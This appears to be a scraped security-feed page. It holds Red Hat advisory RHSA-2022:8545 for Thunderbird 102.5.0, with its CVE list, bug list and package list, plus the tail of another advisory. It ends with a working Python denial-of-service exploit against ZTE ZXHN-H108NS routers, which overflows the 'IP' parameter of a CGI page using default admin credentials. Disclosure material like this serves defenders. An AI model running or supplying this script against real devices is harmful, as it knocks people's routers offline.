https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1TtzjgjWX9erEAQhIpxAApVjEoEzG951crtCuv4E3JMwPoJoF3ONp  
th3oy4c2rt5Gf7WzY6qBqtwmPiN8yYHhuSxWTJvynwiUDqjPM4vWngedRCjqLwbe  
mPXKj4NCSUXQcNAHIk764UqGozB9iz7K4hl6rTjGnVQc77UiEBKppviNNyojxZiJ  
KYFDGL4gAG7zNVXcok/EP/ip1HT9M13NmV2C9eJBwxEWdHBklXs7e91iKFUjuvtC  
NPlcMX9dgHLlbEoFEqYZgvJX7tYfzmY8HMRY3Rylr8awdg//WNMx7W+Ft8DE7xJq  
o+MugHOuQ9p+uLeVCPm4eZWAJIPJXRuAlo2RxQDOsyqjfZYAXOBsHOkIk0bg/8s/  
MSieS1tfwNyr5YdxqHTyv3T6PmUN1ogfOwe4PB9k5ieZVPdGOd/2oSZyZWvpE190  
syxBuMXGddWfmf7i9LqTA6KLnMXJqh8afL6J4MPs7NnYfQ4aWaoyR2B6NMoVU5NW  
VHnWsL113akxAThF8HHt3j0+GclcW7Dr0FKOZSe5TD0EsPE++mYJaAL/sWv7sejK  
cFnWiTSRMbvmPz7/DHv/uB6+aVDFotnjiIzzWa1YsrBhZh2SlPxa9rOEdQ3gJQlD  
MBt/MBfwbaD0zbD5Y2rSzCD5MAHWXSf8mWiuVn1ZZ0vH13kkplNPIHxcP5GC+0Yd  
qlDTRrHRDmY=  
=bM1x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8543-01

Red Hat Security Advisory 2022-8545-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8545-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8545  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.5.0-2.el8_6.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_6.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1S9zjgjWX9erEAQjuAg/+MU5G1KTLHnjHWGMhgL2YQHyHLvMASYoQ  
PSXe8qCZsgE0n0v4HRhLdG0idmJWTxKx3zslkqCGx6+md/ghTrTzhyBgzuNmbBrK  
yRJlfOgoSEonEIlLJpWh+nH+17d4aCXq/Uai7I4eKTknYGJ4RuS09p/b9wzJyDHD  
kZakzG4PfIbeAxaKV3cJs+OTfuY58Fvx3/+8gz1rMRiE8fgm+Q/gb2x6pMkpnMEs  
SS//xwoFPnagQF0/pdcjGtKaWaYlam94J++toz5JV4WN1dVuixmPQeimy6fzcuaK  
B8RfNvJaNllEnqHXSKw+sCJx9r4VeO13AoSx2L5pvY7gaGWjUZM7o7fbqfVuCdny  
3WYG5CVVgGWAMdW2w+VmZW/pZamH+EEnYnMe7BAbcSsPaI5Ny82KibaTEoextRig  
lLHLeN2pRi7sDEzgtx9h3QAgfcityk2ePpBZZ6A8ZvO9UNDfCrc4jl97WDfe7zsS  
AuT5tTC6ebwFg1g+fD8Ci8vwW8C+fFUyyzib+dCDQOWC8mQf4+RWLjd56FKOtT/5  
2BVtIXVX4IbXBSdLNebmRNNx9ftrajZxPu/8lpeHyNDBlHY8uLtD+QcS4G3P+vUl  
usr1wgSw2dd0bc32g7JsTuWp0buFs7IY9Nop9h+FyPperIbfYbRirB8Ekndad26J  
A+ICpbo2nTA=  
=LmmD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8545-01

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 remote stack buffer overflow exploit that causes a denial of service condition.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

Tag

#firefox